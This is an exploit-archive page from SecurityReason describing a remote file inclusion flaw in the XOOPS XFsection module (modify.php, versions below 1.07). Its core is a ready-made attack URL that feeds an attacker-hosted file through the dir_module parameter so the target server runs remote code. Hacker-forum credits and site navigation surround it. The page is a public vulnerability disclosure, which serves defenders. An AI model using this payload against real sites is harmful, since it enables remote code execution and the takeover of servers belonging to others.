SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow ExploitAlert Database

Arrow  Topic :

XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability


Arrow  ExploitAlert : 2430
Arrow  Credit : Sp[L]o1T
Arrow  Date : 14.06.2007

Arrow   Download

Arrow   Plain text version


Arrow  Exploit Code :  

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
XOOPS Module XFsection Remote File Inclusion
version: < 1.07
source :
http://prdownloads.sourceforge.net/xoops/xoops2-mod_xfsection-107.zip
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Discovered by Sp[L]o1T from hTTp://hacking.3Xforum.Ro
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Bug :
http://www.site.com/modules/xfsection/modify.php?dir_module=evilcode.txt?

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Shoutz t0 : Vladiii,Johnny,Str0ke,Shocker,Epic,OSHO,Zapakitul and all
members from Hacking[dot]3Xforum[dot]RO
Contact: splo1t[at]yahoo[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





Arrow  Feedback :

If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)

ADT

Protect your family and valuables with Home Security Systems

Copyright © SecurityReason.com. All Rights Reserved.